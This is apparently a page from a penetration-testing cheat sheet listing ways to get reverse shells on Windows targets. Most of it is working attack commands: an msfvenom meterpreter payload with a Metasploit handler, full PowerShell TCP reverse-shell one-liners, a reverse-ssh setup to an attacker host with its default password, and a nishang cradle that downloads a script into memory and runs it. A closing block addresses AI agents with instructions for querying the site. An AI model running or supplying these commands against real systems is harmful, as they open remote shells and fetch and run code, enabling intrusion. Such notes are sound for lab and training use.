# Shells ## Normal Shells {% embed url="" %} ### Meterpreter First, generate the file which, when executed, starts a reverse shell on the targeted host. Here's an example of an aspx shell: ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.14.73" LPORT=4444 -f aspx -o reverse.aspx ``` Then, in your attacker machine, run Metasploit and start a handler: ``` msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LPORT 4444 set LHOST 10.10.14.73 run ``` Replace the port and IP address with your own ones, of course. ### Interactive Powershell Reverse Shell Caveat: **stderr doesn't work!** ``` powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('IP_ADDRESS_HERE', PORT_NUMBER_HERE);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" ``` ## Full TTY Shells {% embed url="" %} ### Pwncat Caveat: I've tested it on 2 Windows boxes in HTB, and it **didn't work in either one**. Probably a good idea to switch to bash if using ZSH: ``` exec bash --login ``` If your target machine doesn't have internet access, then you'll need to download the plugins first: ``` pwncat --download-plugins ``` Listen on port 4444: ``` pwncat -m windows -lp 4444 ``` Then connect to the pwncat with either a powershell.exe or cmd.exe reverse shell: ``` powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.17',8000);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" ``` ### Reverse SSH Shell {% embed url="" %} Features: * Full TTY shell * File sharing via SFTP * Port forwarding [Requirements](https://github.com/Fahrj/reverse-ssh#requirements): * At least Windows 7 or Windows server 2008 (Windows 10 for conpty, need workaround for lower windows versions for full TTY functionality) * Linux kernel version 2.6.23 and higher Caveats: * SCP doesn't seem to work * SSH port forwarding doesn't seem to work * It hangs sometimes Evades antivirus: Don't know First run this on your machine: ``` ./reverse-ssh -v -l :4444 ``` Then the following on the victim machine (you can use the upx packed executable, use ssh-shellhost on older machines): ``` .\upx_reverse-sshx86.exe -p 4444 kali@ATTACKER_IP ``` And finally on your machine: ``` ssh -p 8888 127.0.0.1 ``` The default password is **letmeinbrudipls** **NB!** If the target doesn't have conpty (pre-windows 10, build 17763), then you need the following workaround: ``` upx_reverse-sshx86.exe -p 4444 -s ssh-shellhost.exe kali@ATTACKER_IP ``` The shellhost.exe executable needs to be in the same directory. It's an executable from [OpenSSH](https://github.com/PowerShell/Win32-OpenSSH/releases/). ### Rlwrap with nishang {% embed url="" %} Serve the script on your machine. Then download the nishang shell to memory: ``` powershell iex (New-Object Net.WebClient).DownloadString('http://IP:PORT/Invoke-PowerShellTcp.ps1'); ``` Start a listener on SOME\_PORT on the attacker machine. Use [rlwrap](https://infinitelogins.com/2020/12/12/improving-windows-powershell-reverse-shells-for-up-down-arrows/) as explained here (not tested). Then run the reverse shell. ``` Invoke-PowerShellTcp -Reverse -IPAddress ATTACKER_IP -Port SOME_PORT ``` ### Socat I think socat can be used to make a decent reverse shell? {% embed url="" %} [
]() --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://heinosass.gitbook.io/leet-sheet/post-exploitation/untitled/shells.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.